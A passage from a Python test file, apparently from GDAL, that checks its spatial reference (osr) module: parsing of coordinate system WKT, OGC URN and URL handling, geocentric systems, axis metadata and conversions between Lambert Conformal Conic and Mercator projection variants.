            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6140"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9108"]],
        AUTHORITY["EPSG","4140"]],
    PROJECTION["Transverse_Mercator"],
    PARAMETER["latitude_of_origin",0],
    PARAMETER["central_meridian",-63],
    PARAMETER["scale_factor",0.9996],
    PARAMETER["false_easting",500000],
    PARAMETER["false_northing",0],
    UNIT["metre",1,
        AUTHORITY["EPSG","9001"]],
    AUTHORITY["EPSG","2038"],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")

    srs2 = osr.SpatialReference()
    srs2.SetFromUserInput("""PROJCS["NAD83(CSRS98) / UTM zone 20N (deprecated)",
    GEOGCS["NAD83(CSRS98)",
        DATUM["NAD83_Canadian_Spatial_Reference_System",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6140"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9108"]],
        AUTHORITY["EPSG","4140"]],
    PROJECTION["Transverse_Mercator"],
    PARAMETER["central_meridian",-63],
    PARAMETER["scale_factor",0.9996],
    PARAMETER["false_easting",500000],
    PARAMETER["false_northing",0],
    UNIT["metre",1,
        AUTHORITY["EPSG","9001"]],
    AUTHORITY["EPSG","2038"],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")

    assert srs1.IsSame(srs2)

###############################################################################
# Test URN support for OGC:CRS84.
def test_osr_basic_12():
    """'CRS:84' must behave like the OGC:CRS84 URN (lon/lat order, no
    authority), distinct from 'WGS84' (lat/lon order, EPSG:4326)."""
    wkt_1 = osr.GetUserInputAsWKT('CRS:84')
    wkt_2 = osr.GetUserInputAsWKT('WGS84')

    assert wkt_1 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Longitude",EAST],AXIS["Latitude",NORTH]]'

    assert wkt_2 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]'

###############################################################################
# Test GEOCCS lookup in supporting data files.


def test_osr_basic_13():
    """EPSG:4328 (geocentric, deprecated) must import with the expected
    GEOCCS WKT and validate; OSR_USE_NON_DEPRECATED=NO keeps the deprecated
    definition instead of substituting its replacement."""
    srs = osr.SpatialReference()
    with gdaltest.config_option('OSR_USE_NON_DEPRECATED', 'NO'):
        srs.ImportFromEPSG(4328)

    expected_wkt = 'GEOCCS["WGS 84 (geocentric) (deprecated)",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Geocentric X",OTHER],AXIS["Geocentric Y",OTHER],AXIS["Geocentric Z",NORTH],AUTHORITY["EPSG","4328"]]'
    wkt = srs.ExportToWkt()

    assert wkt == expected_wkt, 'did not get expected GEOCCS WKT.'

    assert srs.IsGeocentric(), 'srs not recognised as geocentric.'

    assert srs.Validate() == 0, 'epsg geoccs import does not validate!'

###############################################################################
# Manually setup a simple geocentric/wgs84 srs.
def test_osr_basic_14():
    """Manually build a geocentric CRS on WGS84 and check its WKT."""
    srs = osr.SpatialReference()
    srs.SetGeocCS('My Geocentric')
    srs.SetWellKnownGeogCS('WGS84')
    srs.SetLinearUnits('meter', 1.0)

    expected_wkt = 'GEOCCS["My Geocentric",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["meter",1],AXIS["Geocentric X",OTHER],AXIS["Geocentric Y",OTHER],AXIS["Geocentric Z",NORTH]]'
    wkt = srs.ExportToWkt()

    assert wkt == expected_wkt, 'did not get expected GEOCCS WKT.'

    assert srs.IsGeocentric(), 'srs not recognised as geocentric.'

    assert srs.Validate() == 0, 'geocentric srs not recognised as valid.'

###############################################################################
# Test validation and fixup methods.


def test_osr_basic_15():
    """Validate() must reject a GEOCCS whose PRIMEM precedes the DATUM
    (node order violation)."""
    wkt = """GEOCCS["WGS 84 (geocentric)",
    PRIMEM["Greenwich",0,
        AUTHORITY["EPSG","8901"]],
    DATUM["WGS_1984",
        SPHEROID["WGS 84",6378137,298.257223563,
            AUTHORITY["EPSG","7030"]],
        AUTHORITY["EPSG","6326"]],
    UNIT["metre",1],
    AXIS["Geocentric X",OTHER],
    AXIS["Geocentric Y",OTHER],
    AXIS["Geocentric Z",OTHER],
    AUTHORITY["EPSG","4328"]]"""

    srs = osr.SpatialReference()
    srs.SetFromUserInput(wkt)

    # Missing PRIMEM
    assert srs.Validate() != 0

###############################################################################
# Test OSRSetGeocCS()


def test_osr_basic_16():
    """Exercise SetGeocCS(): rename an existing GEOCCS, build one from a
    GEOGCS, and check the expected failures (PROJCS input, invalid GEOGCS)."""

    # Nominal test : change citation of a GEOCCS
    srs = osr.SpatialReference()
    srs.SetFromUserInput("""GEOCCS["WGS 84 (geocentric)",
    PRIMEM["Greenwich",0,
        AUTHORITY["EPSG","8901"]],
    DATUM["WGS_1984",
        SPHEROID["WGS 84",6378137,298.257223563,
            AUTHORITY["EPSG","7030"]],
        AUTHORITY["EPSG","6326"]],
    UNIT["metre",1],
    AXIS["Geocentric X",OTHER],
    AXIS["Geocentric Y",OTHER],
    AXIS["Geocentric Z",OTHER],
    AUTHORITY["EPSG","4328"]]""")
    srs.SetGeocCS("a")
    expect_wkt = """GEOCCS["a",
    DATUM["WGS_1984",
        SPHEROID["WGS 84",6378137,298.257223563,
            AUTHORITY["EPSG","7030"]],
        AUTHORITY["EPSG","6326"]],
    PRIMEM["Greenwich",0,
        AUTHORITY["EPSG","8901"]],
    UNIT["metre",1],
    AXIS["Geocentric X",OTHER],
    AXIS["Geocentric Y",OTHER],
    AXIS["Geocentric Z",NORTH],
    AUTHORITY["EPSG","4328"]]"""
    wkt = srs.ExportToPrettyWkt()
    if wkt != expect_wkt:
        print('Got:%s' % wkt)
        print('Expected:%s' % expect_wkt)
        pytest.fail('Did not get expected result.')

    # Build GEOCCS from a valid GEOGCS
    srs = osr.SpatialReference()
    srs.ImportFromEPSG(4326)
    srs.SetGeocCS("a")
    expect_wkt = """GEOCCS["WGS 84",
    DATUM["WGS_1984",
        SPHEROID["WGS 84",6378137,298.257223563,
            AUTHORITY["EPSG","7030"]],
        AUTHORITY["EPSG","6326"]],
    PRIMEM["Greenwich",0,
        AUTHORITY["EPSG","8901"]],
    UNIT["metre",1,
        AUTHORITY["EPSG","9001"]],
    AXIS["Geocentric X",OTHER],
    AXIS["Geocentric Y",OTHER],
    AXIS["Geocentric Z",NORTH]]"""
    wkt = srs.ExportToPrettyWkt()
    if wkt != expect_wkt:
        print('Got:%s' % wkt)
        print('Expected:%s' % expect_wkt)
        pytest.fail('Did not get expected result.')

    # Error expected. Cannot work on a PROJCS
    srs = osr.SpatialReference()
    srs.ImportFromEPSG(32631)
    ret = srs.SetGeocCS("a")
    if ret == 0:
        print(srs)
        pytest.fail('expected failure')

    # Limit test : build GEOCCS from an invalid GEOGCS
    srs = osr.SpatialReference()
    with gdaltest.error_handler():
        assert srs.SetFromUserInput("""GEOGCS["foo"]""") != 0

###############################################################################
# Test OGC URL support


def test_osr_basic_17():
    """An OGC CRS URL must resolve identically to the equivalent URN."""
    wkt_1 = osr.GetUserInputAsWKT('urn:ogc:def:crs:EPSG::4326')
    wkt_2 = osr.GetUserInputAsWKT('http://www.opengis.net/def/crs/EPSG/0/4326')
    assert wkt_1 == wkt_2, 'CRS URL parsing not as expected.'

###############################################################################
# Test OGC URL support for compound CRS


def test_osr_basic_18():
    """A crs-compound OGC URL must produce a COMPD_CS."""
    # This is a dummy one, but who cares
    wkt = osr.GetUserInputAsWKT('http://www.opengis.net/def/crs-compound?1=http://www.opengis.net/def/crs/EPSG/0/4326&2=http://www.opengis.net/def/crs/EPSG/0/4326')
    assert wkt.startswith('COMPD_CS'), 'CRS URL parsing not as expected.'
###############################################################################
# Test well known GCS names against their corresponding EPSG definitions (#6080)


def test_osr_basic_19():
    """Each well-known GCS name must export the same WKT as its EPSG code."""
    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('WGS84')

    sr_ref = osr.SpatialReference()
    sr_ref.ImportFromEPSG(4326)

    assert sr.ExportToWkt() == sr_ref.ExportToWkt()

    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('WGS72')

    sr_ref = osr.SpatialReference()
    sr_ref.ImportFromEPSG(4322)

    assert sr.ExportToWkt() == sr_ref.ExportToWkt()

    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('NAD27')

    sr_ref = osr.SpatialReference()
    sr_ref.ImportFromEPSG(4267)

    assert sr.ExportToWkt() == sr_ref.ExportToWkt()

    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('NAD83')

    sr_ref = osr.SpatialReference()
    sr_ref.ImportFromEPSG(4269)

    assert sr.ExportToWkt() == sr_ref.ExportToWkt()

###############################################################################
# Test GetAxisName() and GetAxisOrientation() and GetAngularUnitsName()


def test_osr_basic_20():
    """Check axis metadata accessors on EPSG:4326 and on a compound CRS
    (EPSG:4326+5773, which adds a gravity-related height axis)."""
    sr = osr.SpatialReference()
    sr.ImportFromEPSGA(4326)

    assert sr.GetAxesCount() == 2

    assert sr.GetAxisName(None, 0) == 'Geodetic latitude'

    assert sr.GetAxisOrientation(None, 0) == osr.OAO_North

    assert sr.GetAxisName('GEOGCS', 1) == 'Geodetic longitude'

    assert sr.GetAxisOrientation('GEOGCS', 1) == osr.OAO_East

    assert sr.GetAngularUnitsName() == 'degree'

    sr = osr.SpatialReference()
    sr.SetFromUserInput('EPSG:4326+5773')

    assert sr.GetAxisName(None, 0) == 'Geodetic latitude'

    assert sr.GetAxisOrientation(None, 0) == osr.OAO_North

    assert sr.GetAxisName(None, 1) == 'Geodetic longitude'

    assert sr.GetAxisOrientation(None, 1) == osr.OAO_East

    assert sr.GetAxisName(None, 2) == 'Gravity-related height'

    assert sr.GetAxisOrientation(None, 2) == osr.OAO_Up

###############################################################################
# Test IsSame() with equivalent forms of Mercator_1SP and Mercator_2SP


def test_osr_basic_21():
    """Mercator_2SP and the equivalent Mercator_1SP (matching scale factor)
    must compare IsSame(); a different scale factor must not."""
    wkt1 = """PROJCS["unnamed",
    GEOGCS["Segara (Jakarta)",
        DATUM["Gunung_Segara_Jakarta",
            SPHEROID["Bessel 1841",6377397.155,299.1528128]],
        PRIMEM["Jakarta",106.8077194444444],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_2SP"],
    PARAMETER["central_meridian",110],
    PARAMETER["false_easting",3900000],
    PARAMETER["false_northing",900000],
    PARAMETER["standard_parallel_1",4.45405154589751],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""

    wkt2 = """PROJCS["unnamed",
    GEOGCS["Segara (Jakarta)",
        DATUM["Gunung_Segara_Jakarta",
            SPHEROID["Bessel 1841",6377397.155,299.1528128]],
        PRIMEM["Jakarta",106.8077194444444],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_1SP"],
    PARAMETER["central_meridian",110],
    PARAMETER["scale_factor",0.997],
    PARAMETER["false_easting",3900000],
    PARAMETER["false_northing",900000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""

    wkt2_not_equivalent = """PROJCS["unnamed",
    GEOGCS["Segara (Jakarta)",
        DATUM["Gunung_Segara_Jakarta",
            SPHEROID["Bessel 1841",6377397.155,299.1528128]],
        PRIMEM["Jakarta",106.8077194444444],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_1SP"],
    PARAMETER["central_meridian",110],
    PARAMETER["scale_factor",0.998],
    PARAMETER["false_easting",3900000],
    PARAMETER["false_northing",900000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""

    sr1 = osr.SpatialReference()
    sr1.ImportFromWkt(wkt1)
    sr2 = osr.SpatialReference()
    sr2.ImportFromWkt(wkt2)

    # IsSame() must be symmetric.
    assert sr1.IsSame(sr2) != 0

    assert sr2.IsSame(sr1) != 0

    sr2_not_equivalent = osr.SpatialReference()
    sr2_not_equivalent.ImportFromWkt(wkt2_not_equivalent)

    assert sr1.IsSame(sr2_not_equivalent) != 1

###############################################################################
# Test LCC_2SP -> LCC_1SP -> LCC_2SP


def test_osr_basic_22():
    """Round-trip ConvertToOtherProjection() between LCC_2SP and LCC_1SP,
    including the phi0=phi1=phi2 and phi0!=phi1=phi2 special cases."""
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6171"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4171"]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",49],
    PARAMETER["standard_parallel_2",44],
    PARAMETER["latitude_of_origin",46.5],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1,
        AUTHORITY["EPSG","9001"]],
    AXIS["X",EAST],
    AXIS["Y",NORTH],
    AUTHORITY["EPSG","2154"]]""")
    sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP)
    expected_sr2_wkt = """PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6171"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4171"]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",46.5194302239868],
    PARAMETER["central_meridian",3],
    PARAMETER["scale_factor",0.9990510286374693],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6602157.83881033],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""
    expected_sr2 = osr.SpatialReference()
    expected_sr2.ImportFromWkt(expected_sr2_wkt)

    assert sr2.IsSame(expected_sr2) != 0

    # Back to LCC_2SP
    sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP)
    assert sr3.IsSame(sr) != 0

    # Particular case of LCC_2SP with phi0=phi1=phi2
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6171"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4171"]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",46.5],
    PARAMETER["standard_parallel_2",46.5],
    PARAMETER["latitude_of_origin",46.5],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP)
    expected_sr2_wkt = """PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6171"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4171"]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",46.5],
    PARAMETER["central_meridian",3],
    PARAMETER["scale_factor",1],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""
    expected_sr2 = osr.SpatialReference()
    expected_sr2.ImportFromWkt(expected_sr2_wkt)

    assert sr2.IsSame(expected_sr2) != 0

    sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP)
    assert sr3.IsSame(sr) != 0

    # Particular case of LCC_2SP with phi0 != phi1 and phi1=phi2
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6171"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4171"]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",46.4567],
    PARAMETER["standard_parallel_2",46.4567],
    PARAMETER["latitude_of_origin",46.123],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP)
    expected_sr2_wkt = """PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6171"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4171"]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",46.4567],
    PARAMETER["central_meridian",3],
    PARAMETER["scale_factor",1],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6637093.292952879],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""
    expected_sr2 = osr.SpatialReference()
    expected_sr2.ImportFromWkt(expected_sr2_wkt)

    assert sr2.IsSame(expected_sr2) != 0

    sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP)
    expected_sr3_wkt = """PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101,
                AUTHORITY["EPSG","7019"]],
            TOWGS84[0,0,0,0,0,0,0],
            AUTHORITY["EPSG","6171"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4171"]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",46.4567],
    PARAMETER["standard_parallel_2",46.4567],
    PARAMETER["latitude_of_origin",46.4567],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6637093.292952879],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""
    expected_sr3 = osr.SpatialReference()
    expected_sr3.ImportFromWkt(expected_sr3_wkt)

    assert sr3.IsSame(expected_sr3) != 0

###############################################################################
# Test LCC_1SP -> LCC_2SP -> LCC_1SP


def test_osr_basic_23():
    """Round-trip ConvertToOtherProjection() between LCC_1SP and LCC_2SP."""
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["NTF (Paris)",
        DATUM["Nouvelle_Triangulation_Francaise_Paris",
            SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269,
                AUTHORITY["EPSG","7011"]],
            TOWGS84[-168,-60,320,0,0,0,0],
            AUTHORITY["EPSG","6807"]],
        PRIMEM["Paris",2.33722917,
            AUTHORITY["EPSG","8903"]],
        UNIT["grad",0.01570796326794897,
            AUTHORITY["EPSG","9105"]],
        AUTHORITY["EPSG","4807"]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",46.85],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",0.99994471],
    PARAMETER["false_easting",234.358],
    PARAMETER["false_northing",4185861.369],
    UNIT["metre",1,
        AUTHORITY["EPSG","9001"]],
    AXIS["X",EAST],
    AXIS["Y",NORTH],
    AUTHORITY["EPSG","27584"]]""")
    sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP)
    expected_sr2_wkt = """PROJCS["unnamed",
    GEOGCS["NTF (Paris)",
        DATUM["Nouvelle_Triangulation_Francaise_Paris",
            SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269,
                AUTHORITY["EPSG","7011"]],
            TOWGS84[-168,-60,320,0,0,0,0],
            AUTHORITY["EPSG","6807"]],
        PRIMEM["Paris",2.33722917,
            AUTHORITY["EPSG","8903"]],
        UNIT["grad",0.01570796326794897,
            AUTHORITY["EPSG","9105"]],
        AUTHORITY["EPSG","4807"]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",47.51962607709162],
    PARAMETER["standard_parallel_2",46.17820871246364],
    PARAMETER["latitude_of_origin",46.85],
    PARAMETER["central_meridian",0],
    PARAMETER["false_easting",234.358],
    PARAMETER["false_northing",4185861.369],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""
    expected_sr2 = osr.SpatialReference()
    expected_sr2.ImportFromWkt(expected_sr2_wkt)

    assert sr2.IsSame(expected_sr2) != 0

    # Back to LCC_2SP
    sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP)
    assert sr3.IsSame(sr) != 0

###############################################################################
# Test Mercator_1SP -> Mercator_2SP -> Mercator_1SP


def test_osr_basic_24():
    """Round-trip ConvertToOtherProjection() between Mercator_1SP and
    Mercator_2SP."""
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563,
                AUTHORITY["EPSG","7030"]],
            AUTHORITY["EPSG","6326"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4326"]],
    PROJECTION["Mercator_1SP"],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",0.5],
    PARAMETER["false_easting",0],
    PARAMETER["false_northing",0],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_MERCATOR_2SP)
    expected_sr2_wkt = """PROJCS["unnamed",
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563,
                AUTHORITY["EPSG","7030"]],
            AUTHORITY["EPSG","6326"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4326"]],
    PROJECTION["Mercator_2SP"],
    PARAMETER["standard_parallel_1",60.08325228676391],
    PARAMETER["central_meridian",0],
    PARAMETER["false_easting",0],
    PARAMETER["false_northing",0],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]"""
    expected_sr2 = osr.SpatialReference()
    expected_sr2.ImportFromWkt(expected_sr2_wkt)

    assert sr2.IsSame(expected_sr2) != 0

    # Back to LCC_2SP
    sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_MERCATOR_1SP)
    assert sr3.IsSame(sr) != 0

###############################################################################
# Test corner cases of ConvertToOtherProjection()


def test_osr_basic_25():
    """ConvertToOtherProjection() must return None for every invalid input:
    non-projected CRS, bad target name, negative scale factor, invalid
    eccentricity, out-of-range or degenerate parallels/origins."""
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""GEOGCS["WGS 84",
    DATUM["WGS_1984",
        SPHEROID["WGS 84",6378137,298.257223563]],
    PRIMEM["Greenwich",0,
        AUTHORITY["EPSG","8901"]],
    UNIT["degree",0.0174532925199433]]""")
    sr2 = sr.ConvertToOtherProjection('Mercator_1SP')
    assert sr2 is None

    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_1SP"],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",0.5],
    PARAMETER["false_easting",0],
    PARAMETER["false_northing",0],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection(None)
    assert sr2 is None

    sr2 = sr.ConvertToOtherProjection('foo')
    assert sr2 is None

    # Converting to the same projection is the identity.
    sr2 = sr.ConvertToOtherProjection('Mercator_1SP')
    assert sr2.IsSame(sr) != 0

    # Mercator_1SP -> Mercator_2SP: Negative scale factor
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_1SP"],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",-0.5],
    PARAMETER["false_easting",0],
    PARAMETER["false_northing",0],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Mercator_2SP')
    assert sr2 is None

    # Mercator_1SP -> Mercator_2SP: Invalid eccentricity
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,0.1]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_1SP"],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",0.5],
    PARAMETER["false_easting",0],
    PARAMETER["false_northing",0],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Mercator_2SP')
    assert sr2 is None

    # Mercator_2SP -> Mercator_1SP: Invalid standard_parallel_1
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_2SP"],
    PARAMETER["standard_parallel_1",100],
    PARAMETER["central_meridian",0],
    PARAMETER["false_easting",0],
    PARAMETER["false_northing",0],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Mercator_1SP')
    assert sr2 is None

    # Mercator_2SP -> Mercator_1SP: Invalid eccentricity
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,0.1]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Mercator_2SP"],
    PARAMETER["standard_parallel_1",60],
    PARAMETER["central_meridian",0],
    PARAMETER["false_easting",0],
    PARAMETER["false_northing",0],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
